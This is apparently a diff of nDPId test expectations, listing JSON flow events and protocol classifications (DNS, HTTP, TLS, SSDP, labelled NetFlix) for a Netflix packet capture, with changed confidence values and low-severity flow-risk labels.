-00676{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1484319032882,"flow_last_seen":1484319032884,"flow_idle_time":200000,"flow_min_l4_payload_len":54,"flow_max_l4_payload_len":182,"flow_tot_l4_payload_len":236,"flow_avg_l4_payload_len":118,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"192.168.1.1","src_port":52116,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.NetFlix","breed":"Fun","category":"Video"}} -00677{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1484319049645,"flow_last_seen":1484319049681,"flow_idle_time":200000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":329,"flow_tot_l4_payload_len":367,"flow_avg_l4_payload_len":183,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"192.168.1.1","src_port":52347,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.NetFlix","breed":"Fun","category":"Video"}} -00809{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"finished","flow_packets_processed":53,"flow_first_seen":1484319050652,"flow_last_seen":1484319052229,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":41415,"flow_avg_l4_payload_len":781,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.11.145","src_port":53163,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"}} -00809{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"finished","flow_packets_processed":58,"flow_first_seen":1484319052216,"flow_last_seen":1484319054100,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":43240,"flow_avg_l4_payload_len":745,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.10.139","src_port":53164,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"}} -00808{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"finished","flow_packets_processed":55,"flow_first_seen":1484319054101,"flow_last_seen":1484319056189,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":43241,"flow_avg_l4_payload_len":786,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.3.140","src_port":53171,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"}} -00809{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"finished","flow_packets_processed":50,"flow_first_seen":1484319056204,"flow_last_seen":1484319063297,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":21464,"flow_avg_l4_payload_len":429,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.11.133","src_port":53172,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"}} -00809{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"finished","flow_packets_processed":49,"flow_first_seen":1484319056210,"flow_last_seen":1484319062135,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":28763,"flow_avg_l4_payload_len":587,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.11.133","src_port":53173,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"}} -00809{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"finished","flow_packets_processed":54,"flow_first_seen":1484319056214,"flow_last_seen":1484319063597,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":21524,"flow_avg_l4_payload_len":398,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.11.141","src_port":53174,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"}} -00809{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"finished","flow_packets_processed":53,"flow_first_seen":1484319056221,"flow_last_seen":1484319063369,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":26939,"flow_avg_l4_payload_len":508,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.11.141","src_port":53175,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"}} -00809{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"finished","flow_packets_processed":57,"flow_first_seen":1484319056232,"flow_last_seen":1484319064277,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":24419,"flow_avg_l4_payload_len":428,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.11.141","src_port":53176,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"}} -00809{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"finished","flow_packets_processed":55,"flow_first_seen":1484319056233,"flow_last_seen":1484319063283,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":25507,"flow_avg_l4_payload_len":463,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.11.141","src_port":53177,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"}} -00809{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"finished","flow_packets_processed":52,"flow_first_seen":1484319056233,"flow_last_seen":1484319063789,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":24419,"flow_avg_l4_payload_len":469,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.11.141","src_port":53178,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"}} -00809{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"finished","flow_packets_processed":60,"flow_first_seen":1484319056234,"flow_last_seen":1484319063566,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":35980,"flow_avg_l4_payload_len":599,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.11.141","src_port":53179,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"}} -00809{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"finished","flow_packets_processed":55,"flow_first_seen":1484319056241,"flow_last_seen":1484319062003,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":24422,"flow_avg_l4_payload_len":444,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.11.141","src_port":53180,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"}} -00809{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"finished","flow_packets_processed":54,"flow_first_seen":1484319056264,"flow_last_seen":1484319064524,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":21416,"flow_avg_l4_payload_len":396,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.11.141","src_port":53181,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"}} -00809{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"finished","flow_packets_processed":58,"flow_first_seen":1484319056264,"flow_last_seen":1484319063421,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":28764,"flow_avg_l4_payload_len":495,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.11.141","src_port":53182,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"}} -00812{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"finished","flow_packets_processed":1307,"flow_first_seen":1484319064590,"flow_last_seen":1484319117695,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1155976,"flow_avg_l4_payload_len":884,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.3.140","src_port":53183,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"}} -00811{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"finished","flow_packets_processed":178,"flow_first_seen":1484319064593,"flow_last_seen":1484319070693,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":145506,"flow_avg_l4_payload_len":817,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.11.141","src_port":53184,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"}} -00811{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"finished","flow_packets_processed":788,"flow_first_seen":1484319070636,"flow_last_seen":1484319117609,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":707039,"flow_avg_l4_payload_len":897,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.11.133","src_port":53210,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"}} -00813{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"finished","flow_packets_processed":1872,"flow_first_seen":1484319091296,"flow_last_seen":1484319117694,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1734535,"flow_avg_l4_payload_len":926,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.11.141","src_port":53217,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"}} -00681{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":37,"flow_first_seen":1484319032888,"flow_last_seen":1484319063911,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":6835,"flow_avg_l4_payload_len":184,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"54.69.204.241","src_port":53105,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"}} -00682{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":34,"flow_first_seen":1484319033631,"flow_last_seen":1484319064012,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":10476,"flow_avg_l4_payload_len":308,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"54.69.204.241","src_port":53118,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"}} -00683{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":36,"flow_first_seen":1484319033943,"flow_last_seen":1484319064790,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":10490,"flow_avg_l4_payload_len":291,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"54.69.204.241","src_port":53119,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"}} -00682{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"finished","flow_packets_processed":45,"flow_first_seen":1484319064711,"flow_last_seen":1484319096924,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":24950,"flow_avg_l4_payload_len":554,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.37.36.252","src_port":53203,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"}} -00677{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1484319064683,"flow_last_seen":1484319064699,"flow_idle_time":200000,"flow_min_l4_payload_len":41,"flow_max_l4_payload_len":206,"flow_tot_l4_payload_len":247,"flow_avg_l4_payload_len":123,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"192.168.1.1","src_port":60962,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.NetFlix","breed":"Fun","category":"Video"}} +00819{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"finished","flow_packets_processed":71,"flow_first_seen":1484319064669,"flow_last_seen":1484319117874,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":53403,"flow_avg_l4_payload_len":752,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"54.191.17.51","src_port":53193,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"}} +00818{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"finished","flow_packets_processed":38,"flow_first_seen":1484319064671,"flow_last_seen":1484319065592,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":16026,"flow_avg_l4_payload_len":421,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"54.191.17.51","src_port":53202,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"}} +00682{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"finished","flow_packets_processed":27,"flow_first_seen":1484319049465,"flow_last_seen":1484319081182,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":14703,"flow_avg_l4_payload_len":544,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.89.39.139","src_port":53152,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"}} +00684{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"finished","flow_packets_processed":41,"flow_first_seen":1484319048780,"flow_last_seen":1484319080085,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":30432,"flow_avg_l4_payload_len":742,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"54.201.191.132","src_port":53151,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"}} +00680{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":28,"flow_first_seen":1484319032984,"flow_last_seen":1484319063913,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":4806,"flow_avg_l4_payload_len":171,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.32.196.36","src_port":53115,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"}} +00682{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":148,"flow_first_seen":1484319032986,"flow_last_seen":1484319080084,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":64178,"flow_avg_l4_payload_len":433,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.32.196.36","src_port":53116,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"}} +00814{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":20,"flow_first_seen":1484319033206,"flow_last_seen":1484319063914,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":923,"flow_tot_l4_payload_len":1689,"flow_avg_l4_payload_len":84,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.32.196.36","src_port":53117,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"}} +00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":16,"flow_first_seen":1484319033886,"flow_last_seen":1484319113019,"flow_idle_time":200000,"flow_min_l4_payload_len":122,"flow_max_l4_payload_len":125,"flow_tot_l4_payload_len":1976,"flow_avg_l4_payload_len":123,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"239.255.255.250","src_port":53776,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} +00683{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"finished","flow_packets_processed":63,"flow_first_seen":1484319043012,"flow_last_seen":1484319085476,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":42483,"flow_avg_l4_payload_len":674,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"184.25.204.25","src_port":53148,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"}} +00685{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"finished","flow_packets_processed":126,"flow_first_seen":1484319043013,"flow_last_seen":1484319077933,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":119751,"flow_avg_l4_payload_len":950,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"184.25.204.25","src_port":53149,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"}} +00683{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"finished","flow_packets_processed":21,"flow_first_seen":1484319043665,"flow_last_seen":1484319075730,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":11829,"flow_avg_l4_payload_len":563,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"184.25.204.25","src_port":53150,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"}} +00814{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"finished","flow_packets_processed":637,"flow_first_seen":1484319049672,"flow_last_seen":1484319109285,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":702214,"flow_avg_l4_payload_len":1102,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"184.25.204.24","src_port":53153,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"25": {"risk":"HTTP Suspicious Content","severity":"High","risk_score": {"total":510,"client":355,"server":155}}},"confidence": {"6":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"}} 